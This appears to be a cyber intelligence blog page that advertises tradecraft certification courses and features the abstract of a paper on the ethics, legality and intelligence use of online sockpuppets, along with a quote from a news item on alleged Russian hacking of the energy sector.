Dates and Times TBD

https://cybershafarat.com/2016/07/31/intelligenceanalysis/

http://www.planetreg.com/intelAmsterdam to register for the course.

*********************************************************************
Cyber Intelligence Tradecraft Certification
Cyber CounterIntelligence Tradecraft Certification
Cyber Intelligence Analyst Certification

Upcoming Classes

*********************************************************************

 

Featured post

The Utilization and Management of Sockpuppets within Online Communities – Melissa Morris

Abstract

Image The Internet is the principle arena for online communication. Within the online community, individuals can choose who they are. If a member chooses an online identity that is something other than who they are in real life, then the identity created is a sockpuppet. The purpose of this research was to examine the utilization and management of sockpuppets within online communities. What are the ethical and legal boundaries in the use of sockpuppets within civilian online communities? What is the role of sockpuppets in the intelligence community? The intent behind sockpuppet use determines the ethical and legal boundaries within civilian online communities. If the intent is for entertainment and communication, online communities exhibit various levels of tolerance for ethical versus unethical choices of sockpuppets. However, legal boundaries are crossed if the intent is to do harm. The United States is not consistent with legislation involving sockpuppets. The intelligence community uses sockpuppets to assist in maintaining national security. A sockpuppet allows an analyst to infiltrate targeted online communities, and once inside to gather information about the group. Sockpuppets are accepted within the communities and gain a perspective similar to an offline undercover agent. It takes great effort and skill to create long lasting and believable identities that effectively collect actionable intelligence. Conclusions generated based on a review of the current research include; federal legislation and management defining and clarifying criminal use of a sockpuppet, the creation of a best practices manual for the intelligence community to standardize training and utilization of sockpuppets, as well as continued study of the evolution of the sockpuppet.

You may download the paper (PDF) at the link below.

The Utilization and Management of Sockpuppets – Melissa Morris

Melissa may be reached at: mmorris537@gmail.com 

©Copyright 2014  by Melissa Morris All Rights Reserved

Featured post

US accuses Russia of hacking energy sector to gather intel for attacks – Business Insider

“Why trigger an attack when you don’t need it?” Jeff Bardin, the chief intelligence officer at the cyber intelligence firm Treadstone 71, told Business Insider, adding that the Russians may be waiting for an economic emergency to launch a full-throated cyberattack.

http://www.businessinsider.com/us-accuses-russia-of-hacking-energy-sector-to-gather-intel-for-attacks-2018-3?r=UK&IR=T

Blog at WordPress.com.

Up ↑

%d bloggers like this: